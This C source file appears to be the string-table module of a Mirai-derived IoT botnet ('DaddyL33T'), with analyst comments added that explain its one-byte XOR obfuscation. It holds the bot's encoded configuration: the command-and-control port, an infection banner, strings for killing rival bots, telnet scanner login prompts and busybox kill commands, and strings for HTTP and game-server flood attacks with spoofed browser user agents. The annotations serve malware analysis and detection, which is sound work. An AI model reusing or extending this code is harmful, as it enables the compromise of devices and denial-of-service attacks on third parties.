  1. #define _GNU_SOURCE
  2.  
  3. #ifdef DEBUG
  4. #include <stdio.h>
  5. #endif
  6. #include <stdint.h>
  7. #include <stdlib.h>
  8.  
  9. #include "includes.h"
  10. #include "table.h"
  11. #include "util.h"
  12.  
// Obfuscation key for the string table. The literal is 0xfeddf followed by the
// integer suffix `llu` (the trailing letters are a suffix, not hex digits), so
// the stored value is 0x000FEDDF. toggle_obf() XORs every byte with all four
// key bytes in turn, which collapses to a single-byte XOR with
// 0xDF ^ 0xED ^ 0x0F ^ 0x00 = 0x3D — that is why every blob passed to
// add_entry() in table_init() ends in \x3D (the encoded NUL terminator).
uint32_t table_key = 0xfeddfllu;
// One slot per TABLE_* id, filled by table_init(); entries stay obfuscated
// until table_unlock_val() is called on them. TABLE_MAX_KEYS presumably comes
// from table.h (not visible here) — no caller in this file bounds-checks ids.
struct table_value table[TABLE_MAX_KEYS];
  15.  
/*
 * Populate the global string table with XOR-obfuscated entries.
 *
 * Analyst notes, all grounded in this file:
 *  - Every blob is handed to add_entry() still obfuscated; the comment above
 *    each call is the plaintext. The trailing \x3D of every entry is the
 *    encoded NUL terminator and the length argument counts it (e.g. "/proc/"
 *    is 6 characters, stored as 7 bytes).
 *  - toggle_obf() applies all four bytes of table_key to each byte, so the
 *    whole table is protected by a single-byte XOR (0x3D for the key defined
 *    above). Decoding a blob for detection or configuration extraction is
 *    therefore a one-byte XOR per byte.
 *  - Only the DEBUG build tracks the locked/unlocked state; there is no
 *    run-time guard against decoding an entry twice in a release build.
 *  - add_entry() and toggle_obf() are `static` and defined later in this
 *    file, so their prototypes presumably come from table.h (not visible).
 *  - Nothing here is freed; the table is expected to live for the whole
 *    process.
 */
void table_init(void)
{
    /*
    CONNECTION SHIT
    */
    // 420  (two bytes, big-endian port once decoded)
    add_entry(TABLE_CNC_PORT, "\x3C\x99", 2);
    // 48101
    add_entry(TABLE_SCAN_CB_PORT, "\x86\xD8", 2);
    /*
    EXECUTE MSG
    */

    //DaddyL33T Infected Your Shit
    add_entry(TABLE_EXEC_SUCCESS, "\x79\x5C\x59\x59\x44\x71\x0E\x0E\x69\x1D\x74\x53\x5B\x58\x5E\x49\x58\x59\x1D\x64\x52\x48\x4F\x1D\x6E\x55\x54\x49\x3D", 29);
    /*
    KILLER STRINGS
    */
    // /proc/
    add_entry(TABLE_KILLER_PROC, "\x12\x4D\x4F\x52\x5E\x12\x3D", 7);
    // /exe
    add_entry(TABLE_KILLER_EXE, "\x12\x58\x45\x58\x3D", 5);
    // /fd
    add_entry(TABLE_KILLER_FD, "\x12\x5B\x59\x3D", 4);
    // /proc/net/tcp
    add_entry(TABLE_KILLER_TCP, "\x12\x4D\x4F\x52\x5E\x12\x53\x58\x49\x12\x49\x5E\x4D\x3D", 14);
    // /maps
    add_entry(TABLE_KILLER_MAPS, "\x12\x50\x5C\x4D\x4E\x3D", 6);
    // /status
    add_entry(TABLE_KILLER_STATUS, "\x12\x4E\x49\x5C\x49\x48\x4E\x3D", 8);
    // .anime
    add_entry(TABLE_KILLER_ANIME, "\x13\x5C\x53\x54\x50\x58\x3D", 7);
    // /proc/net/route
    add_entry(TABLE_MEM_ROUTE, "\x12\x4D\x4F\x52\x5E\x12\x53\x58\x49\x12\x4F\x52\x48\x49\x58\x3D", 16);
    // /proc/cpuinfo
    add_entry(TABLE_MEM_CPUINFO, "\x12\x4D\x4F\x52\x5E\x12\x5E\x4D\x48\x54\x53\x5B\x52\x3D", 14);
    // BOGOMIPS
    add_entry(TABLE_MEM_BOGO, "\x7F\x72\x7A\x72\x70\x74\x6D\x6E\x3D", 9);
    // /etc/rc.d/rc.local
    add_entry(TABLE_MEM_RC, "\x12\x58\x49\x5E\x12\x4F\x5E\x13\x59\x12\x4F\x5E\x13\x51\x52\x5E\x5C\x51\x3D", 19);
    // g1abc4dmo35hnp2lie0kjf
    add_entry(TABLE_MEM_MASUTA1, "\x5A\x0C\x5C\x5F\x5E\x09\x59\x50\x52\x0E\x08\x55\x53\x4D\x0F\x51\x54\x58\x0D\x56\x57\x5B\x3D", 23);
    // assword
    add_entry(TABLE_MEM_MASUTA2, "\x5C\x4E\x4E\x4A\x52\x4F\x59\x3D", 8);
    // /dev/watchdog
    add_entry(TABLE_MEM_MIRAI1, "\x12\x59\x58\x4B\x12\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 14);
    // /dev/misc/watchdog
    add_entry(TABLE_MEM_MIRAI2, "\x12\x59\x58\x4B\x12\x50\x54\x4E\x5E\x12\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 19);
    // /dev/FTWDT101_watchdog
    add_entry(TABLE_MEM_VAMP1, "\x12\x59\x58\x4B\x12\x7B\x69\x6A\x79\x69\x0C\x0D\x0C\x62\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 23);
    // /dev/FTWDT101\ watchdog
    add_entry(TABLE_MEM_VAMP2, "\x12\x59\x58\x4B\x12\x7B\x69\x6A\x79\x69\x0C\x0D\x0C\x61\x1D\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 24);
    // /dev/netslink/
    add_entry(TABLE_MEM_VAMP3, "\x12\x59\x58\x4B\x12\x53\x58\x49\x4E\x51\x54\x53\x56\x12\x3D", 15);
    /*
    SCANNER SHIT
    */
    //shell
    add_entry(TABLE_SCAN_SHELL, "\x4E\x55\x58\x51\x51\x3D", 6);
    //enable
    add_entry(TABLE_SCAN_ENABLE, "\x58\x53\x5C\x5F\x51\x58\x3D", 7);
    //system
    add_entry(TABLE_SCAN_SYSTEM, "\x4E\x44\x4E\x49\x58\x50\x3D", 7);
    //sh
    add_entry(TABLE_SCAN_SH, "\x4E\x55\x3D", 3);
    // /bin/busybox daddyl33t
    add_entry(TABLE_SCAN_QUERY, "\x12\x5F\x54\x53\x12\x5F\x48\x4E\x44\x5F\x52\x45\x1D\x59\x5C\x59\x59\x44\x51\x0E\x0E\x49\x3D", 23);
    // daddyl33t: applet not found
    add_entry(TABLE_SCAN_RESP, "\x59\x5C\x59\x59\x44\x51\x0E\x0E\x49\x07\x1D\x5C\x4D\x4D\x51\x58\x49\x1D\x53\x52\x49\x1D\x5B\x52\x48\x53\x59\x3D", 28);
    // ncorrect
    add_entry(TABLE_SCAN_NCORRECT, "\x53\x5E\x52\x4F\x4F\x58\x5E\x49\x3D", 9);
    // assword
    add_entry(TABLE_SCAN_ASSWORD, "\x5C\x4E\x4E\x4A\x52\x4F\x59\x3D", 8);
    // ogin
    add_entry(TABLE_SCAN_OGIN, "\x52\x5A\x54\x53\x3D", 5);
    // enter
    add_entry(TABLE_SCAN_ENTER, "\x58\x53\x49\x58\x4F\x3D", 6);
    // /bin/busybox ps
    add_entry(TABLE_SCAN_PS, "\x12\x5F\x54\x53\x12\x5F\x48\x4E\x44\x5F\x52\x45\x1D\x4D\x4E\x3D", 16);
    // /bin/busybox kill -9
    add_entry(TABLE_SCAN_KILL_9, "\x12\x5F\x54\x53\x12\x5F\x48\x4E\x44\x5F\x52\x45\x1D\x56\x54\x51\x51\x1D\x10\x04\x3D", 21);
    /*
    ATTACK STRINGS
    */
    // TSource Engine Query
    add_entry(TABLE_ATK_VSE, "\x69\x6E\x52\x48\x4F\x5E\x58\x1D\x78\x53\x5A\x54\x53\x58\x1D\x6C\x48\x58\x4F\x44\x3D", 21);
    // /etc/resolv.conf
    add_entry(TABLE_ATK_RESOLVER, "\x12\x58\x49\x5E\x12\x4F\x58\x4E\x52\x51\x4B\x13\x5E\x52\x53\x5B\x3D", 17);
    // nameserver
    add_entry(TABLE_ATK_NSERV, "\x53\x5C\x50\x58\x4E\x58\x4F\x4B\x58\x4F\x3D", 11);
    // "Connection: keep-alive"
    add_entry(TABLE_ATK_KEEP_ALIVE, "\x7E\x52\x53\x53\x58\x5E\x49\x54\x52\x53\x07\x1D\x56\x58\x58\x4D\x10\x5C\x51\x54\x4B\x58\x3D", 23);
    // "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
    add_entry(TABLE_ATK_ACCEPT, "\x7C\x5E\x5E\x58\x4D\x49\x07\x1D\x49\x58\x45\x49\x12\x55\x49\x50\x51\x11\x5C\x4D\x4D\x51\x54\x5E\x5C\x49\x54\x52\x53\x12\x45\x55\x49\x50\x51\x16\x45\x50\x51\x11\x5C\x4D\x4D\x51\x54\x5E\x5C\x49\x54\x52\x53\x12\x45\x50\x51\x06\x4C\x00\x0D\x13\x04\x11\x54\x50\x5C\x5A\x58\x12\x4A\x58\x5F\x4D\x11\x17\x12\x17\x06\x4C\x00\x0D\x13\x05\x3D", 83);
    // "Accept-Language: en-US,en;q=0.8"
    add_entry(TABLE_ATK_ACCEPT_LNG, "\x7C\x5E\x5E\x58\x4D\x49\x10\x71\x5C\x53\x5A\x48\x5C\x5A\x58\x07\x1D\x58\x53\x10\x68\x6E\x11\x58\x53\x06\x4C\x00\x0D\x13\x05\x3D", 32);
    // "Content-Type: application/x-www-form-urlencoded"
    add_entry(TABLE_ATK_CONTENT_TYPE, "\x7E\x52\x53\x49\x58\x53\x49\x10\x69\x44\x4D\x58\x07\x1D\x5C\x4D\x4D\x51\x54\x5E\x5C\x49\x54\x52\x53\x12\x45\x10\x4A\x4A\x4A\x10\x5B\x52\x4F\x50\x10\x48\x4F\x51\x58\x53\x5E\x52\x59\x58\x59\x3D", 48);
    // "setCookie('"
    add_entry(TABLE_ATK_SET_COOKIE, "\x4E\x58\x49\x7E\x52\x52\x56\x54\x58\x15\x1A\x3D", 12);
    // "refresh:"
    add_entry(TABLE_ATK_REFRESH_HDR, "\x4F\x58\x5B\x4F\x58\x4E\x55\x07\x3D", 9);
    // "location:"
    add_entry(TABLE_ATK_LOCATION_HDR, "\x51\x52\x5E\x5C\x49\x54\x52\x53\x07\x3D", 10);
    // "set-cookie:"
    add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x4E\x58\x49\x10\x5E\x52\x52\x56\x54\x58\x07\x3D", 12);
    // "content-length:"
    add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x5E\x52\x53\x49\x58\x53\x49\x10\x51\x58\x53\x5A\x49\x55\x07\x3D", 16);
    // "transfer-encoding:"
    add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x49\x4F\x5C\x53\x4E\x5B\x58\x4F\x10\x58\x53\x5E\x52\x59\x54\x53\x5A\x07\x3D", 19);
    // "chunked"
    add_entry(TABLE_ATK_CHUNKED, "\x5E\x55\x48\x53\x56\x58\x59\x3D", 8);
    // "keep-alive"
    add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x56\x58\x58\x4D\x10\x5C\x51\x54\x4B\x58\x3D", 11);
    // "connection:"
    add_entry(TABLE_ATK_CONNECTION_HDR, "\x5E\x52\x53\x53\x58\x5E\x49\x54\x52\x53\x07\x3D", 12);
    // "server: dosarrest"
    add_entry(TABLE_ATK_DOSARREST, "\x4E\x58\x4F\x4B\x58\x4F\x07\x1D\x59\x52\x4E\x5C\x4F\x4F\x58\x4E\x49\x3D", 18);
    // "server: cloudflare-nginx"
    add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x4E\x58\x4F\x4B\x58\x4F\x07\x1D\x5E\x51\x52\x48\x59\x5B\x51\x5C\x4F\x58\x10\x53\x5A\x54\x53\x45\x3D", 25);
    // "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
    add_entry(TABLE_HTTP_ONE, "\x70\x52\x47\x54\x51\x51\x5C\x12\x08\x13\x0D\x1D\x15\x6A\x54\x53\x59\x52\x4A\x4E\x1D\x73\x69\x1D\x0C\x0D\x13\x0D\x06\x1D\x6A\x54\x53\x0B\x09\x06\x1D\x45\x0B\x09\x14\x1D\x7C\x4D\x4D\x51\x58\x6A\x58\x5F\x76\x54\x49\x12\x08\x0E\x0A\x13\x0E\x0B\x1D\x15\x76\x75\x69\x70\x71\x11\x1D\x51\x54\x56\x58\x1D\x7A\x58\x5E\x56\x52\x14\x1D\x7E\x55\x4F\x52\x50\x58\x12\x0B\x0E\x13\x0D\x13\x0E\x0F\x0E\x04\x13\x05\x09\x1D\x6E\x5C\x5B\x5C\x4F\x54\x12\x08\x0E\x0A\x13\x0E\x0B\x3D", 115);
    // "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
    add_entry(TABLE_HTTP_TWO, "\x70\x52\x47\x54\x51\x51\x5C\x12\x08\x13\x0D\x1D\x15\x6A\x54\x53\x59\x52\x4A\x4E\x1D\x73\x69\x1D\x0C\x0D\x13\x0D\x06\x1D\x6A\x54\x53\x0B\x09\x06\x1D\x45\x0B\x09\x14\x1D\x7C\x4D\x4D\x51\x58\x6A\x58\x5F\x76\x54\x49\x12\x08\x0E\x0A\x13\x0E\x0B\x1D\x15\x76\x75\x69\x70\x71\x11\x1D\x51\x54\x56\x58\x1D\x7A\x58\x5E\x56\x52\x14\x1D\x7E\x55\x4F\x52\x50\x58\x12\x0B\x0F\x13\x0D\x13\x0E\x0F\x0D\x0F\x13\x04\x09\x1D\x6E\x5C\x5B\x5C\x4F\x54\x12\x08\x0E\x0A\x13\x0E\x0B\x3D", 115);
    // "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
    add_entry(TABLE_HTTP_THREE, "\x70\x52\x47\x54\x51\x51\x5C\x12\x08\x13\x0D\x1D\x15\x6A\x54\x53\x59\x52\x4A\x4E\x1D\x73\x69\x1D\x0C\x0D\x13\x0D\x06\x1D\x6A\x54\x53\x0B\x09\x06\x1D\x45\x0B\x09\x06\x1D\x4F\x4B\x07\x08\x0A\x13\x0D\x14\x1D\x7A\x58\x5E\x56\x52\x12\x0F\x0D\x0C\x0D\x0D\x0C\x0D\x0C\x1D\x7B\x54\x4F\x58\x5B\x52\x45\x12\x08\x0A\x13\x0D\x3D", 79);
    // "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
    add_entry(TABLE_HTTP_FOUR, "\x70\x52\x47\x54\x51\x51\x5C\x12\x08\x13\x0D\x1D\x15\x6A\x54\x53\x59\x52\x4A\x4E\x1D\x73\x69\x1D\x0B\x13\x0C\x06\x1D\x6A\x54\x53\x0B\x09\x06\x1D\x45\x0B\x09\x14\x1D\x7C\x4D\x4D\x51\x58\x6A\x58\x5F\x76\x54\x49\x12\x08\x0E\x0A\x13\x0E\x0B\x1D\x15\x76\x75\x69\x70\x71\x11\x1D\x51\x54\x56\x58\x1D\x7A\x58\x5E\x56\x52\x14\x1D\x7E\x55\x4F\x52\x50\x58\x12\x0B\x0E\x13\x0D\x13\x0E\x0F\x0E\x04\x13\x05\x09\x1D\x6E\x5C\x5B\x5C\x4F\x54\x12\x08\x0E\x0A\x13\x0E\x0B\x3D", 114);
    // "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
    add_entry(TABLE_HTTP_FIVE, "\x70\x52\x47\x54\x51\x51\x5C\x12\x08\x13\x0D\x1D\x15\x6A\x54\x53\x59\x52\x4A\x4E\x1D\x73\x69\x1D\x0B\x13\x0C\x06\x1D\x6A\x54\x53\x0B\x09\x06\x1D\x45\x0B\x09\x14\x1D\x7C\x4D\x4D\x51\x58\x6A\x58\x5F\x76\x54\x49\x12\x08\x0E\x0A\x13\x0E\x0B\x1D\x15\x76\x75\x69\x70\x71\x11\x1D\x51\x54\x56\x58\x1D\x7A\x58\x5E\x56\x52\x14\x1D\x7E\x55\x4F\x52\x50\x58\x12\x0B\x0F\x13\x0D\x13\x0E\x0F\x0D\x0F\x13\x04\x09\x1D\x6E\x5C\x5B\x5C\x4F\x54\x12\x08\x0E\x0A\x13\x0E\x0B\x3D", 114);

    /*
    MISC SHIT
    */
    // /dev/watchdog  (same blob as TABLE_MEM_MIRAI1 above, stored twice)
    add_entry(TABLE_MISC_WATCHDOG, "\x12\x59\x58\x4B\x12\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 14);
    // /dev/misc/watchdog  (same blob as TABLE_MEM_MIRAI2 above)
    add_entry(TABLE_MISC_WATCHDOG2, "\x12\x59\x58\x4B\x12\x50\x54\x4E\x5E\x12\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 19);
    // g1abc4dmo35hnp2lie0kjf  (same blob as TABLE_MEM_MASUTA1 above)
    add_entry(TABLE_MISC_RAND, "\x5A\x0C\x5C\x5F\x5E\x09\x59\x50\x52\x0E\x08\x55\x53\x4D\x0F\x51\x54\x58\x0D\x56\x57\x5B\x3D", 23);
    // dvrHelper
    add_entry(TABLE_MISC_DVRHELP, "\x59\x4B\x4F\x75\x58\x51\x4D\x58\x4F\x3D", 10);
}
  159.  
/*
 * Decode (un-obfuscate) entry `id` in place so that table_retrieve_val()
 * hands out plaintext.
 *
 * Only the DEBUG build tracks whether the entry is already decoded; in a
 * release build `val` is unused and a second unlock silently re-obfuscates
 * the string, because toggle_obf() is a plain XOR toggle.
 *
 * @param id  table slot; not range-checked against TABLE_MAX_KEYS.
 */
void table_unlock_val(uint8_t id)
{
    struct table_value *val = &table[id];

#ifdef DEBUG
    // Refuse to toggle an entry that is already plaintext.
    if (!val->locked)
    {
        printf("[table] Tried to double-unlock value %d\n", id);
        return;
    }
#endif

    toggle_obf(id);
}
  174.  
/*
 * Re-obfuscate entry `id` in place after use. Mirror image of
 * table_unlock_val(): the same toggle_obf() call does the work, and only the
 * DEBUG build refuses to lock an entry that is already locked (which in a
 * release build would silently decode it instead).
 *
 * @param id  table slot; not range-checked against TABLE_MAX_KEYS.
 */
void table_lock_val(uint8_t id)
{
    struct table_value *val = &table[id];

#ifdef DEBUG
    // Refuse to toggle an entry that is already obfuscated.
    if (val->locked)
    {
        printf("[table] Tried to double-lock value\n");
        return;
    }
#endif

    toggle_obf(id);
}
  189.  
/*
 * Return a pointer to entry `id`'s buffer and, optionally, its length.
 *
 * The pointer aliases the table's own heap buffer — no copy is made — so the
 * caller must not free it, and its contents flip between obfuscated and
 * plaintext whenever the entry is locked/unlocked. Only the DEBUG build
 * refuses to return a still-obfuscated entry; a release build returns
 * whatever bytes are currently stored.
 *
 * @param id   table slot (an int here, unlike the uint8_t used by the other
 *             entry points); not bounds-checked against TABLE_MAX_KEYS.
 * @param len  may be NULL; otherwise receives val_len, which includes the
 *             terminating NUL (see the lengths passed in table_init()).
 * @return pointer into the table, or NULL (DEBUG build only) when locked.
 */
char *table_retrieve_val(int id, int *len)
{
    struct table_value *val = &table[id];

#ifdef DEBUG
    if (val->locked)
    {
        printf("[table] Tried to access table.%d but it is locked\n", id);
        return NULL;
    }
#endif

    if (len != NULL)
        *len = (int)val->val_len;
    return val->val;
}
  206.  
/*
 * Copy `buf_len` bytes of an (already obfuscated) blob into a fresh heap
 * buffer and record it in slot `id`.
 *
 * NOTE(review): the malloc() result is not checked, so on allocation failure
 * util_memcpy() writes through NULL. The buffer is never freed and a slot
 * written twice leaks its previous buffer. util_memcpy and TRUE come from
 * util.h / includes.h — presumably a memcpy-alike and a boolean constant;
 * confirm against those headers.
 *
 * @param id       table slot; not bounds-checked against TABLE_MAX_KEYS.
 * @param buf      obfuscated bytes, including the encoded NUL terminator.
 * @param buf_len  byte count to copy; stored truncated to uint16_t.
 */
static void add_entry(uint8_t id, char *buf, int buf_len)
{
    char *cpy = malloc(buf_len);

    util_memcpy(cpy, buf, buf_len);

    table[id].val = cpy;
    table[id].val_len = (uint16_t)buf_len;
#ifdef DEBUG
    // Entries start out obfuscated ("locked").
    table[id].locked = TRUE;
#endif
}
  219.  
/*
 * XOR every byte of entry `id` with the four bytes of table_key in turn.
 *
 * Because all four key bytes are applied to the same byte, the loop body is
 * equivalent to `val->val[i] ^= (k1 ^ k2 ^ k3 ^ k4)`: a single-byte XOR,
 * 0x3D for the key defined at the top of this file. That is why one function
 * serves as both lock and unlock, and why the scheme is trivially reversible
 * for anyone extracting the table from a sample. The loop runs over val_len
 * bytes, so the encoded NUL terminator is transformed too.
 *
 * @param id  table slot; not bounds-checked against TABLE_MAX_KEYS.
 */
static void toggle_obf(uint8_t id)
{
    int i;
    struct table_value *val = &table[id];
    uint8_t k1 = table_key & 0xff,
            k2 = (table_key >> 8) & 0xff,
            k3 = (table_key >> 16) & 0xff,
            k4 = (table_key >> 24) & 0xff;

    for (i = 0; i < val->val_len; i++)
    {
        val->val[i] ^= k1;
        val->val[i] ^= k2;
        val->val[i] ^= k3;
        val->val[i] ^= k4;
    }

#ifdef DEBUG
    // DEBUG-only bookkeeping used by the lock/unlock/retrieve guards.
    val->locked = !val->locked;
#endif
}